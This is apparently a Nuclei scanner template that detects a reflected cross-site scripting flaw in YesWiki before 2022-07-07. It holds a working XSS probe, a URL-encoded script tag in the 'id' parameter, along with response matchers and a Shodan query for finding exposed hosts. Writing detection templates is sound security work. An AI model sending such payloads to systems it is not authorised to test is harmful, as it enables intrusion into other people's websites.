45 lines
1.2 KiB
YAML
45 lines
1.2 KiB
YAML
id: yeswiki-xss
|
|
|
|
info:
|
|
name: YesWiki <2022-07-07 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
YesWiki before 2022-07-07 contains a cross-site scripting vulnerability via the id parameter in the AccueiL URL.
|
|
reference:
|
|
- https://huntr.dev/bounties/de4db96c-2717-4c0e-b7aa-eee756ca19d3/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
|
cvss-score: 6.5
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"yeswiki"
|
|
tags: yeswiki,huntr,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script>"
|
|
- "Query failed:"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a0046304402206e24e0f336c91fb5e9ed6a3b2e6c92cecc60a311d20b0c180b888576b5b504d4022059a1c3652a4ef4c46d38f32747e9574275001159d4926a204fb2e2b431e3ca4c:922c64590222798bb761d5b6d8e72950
|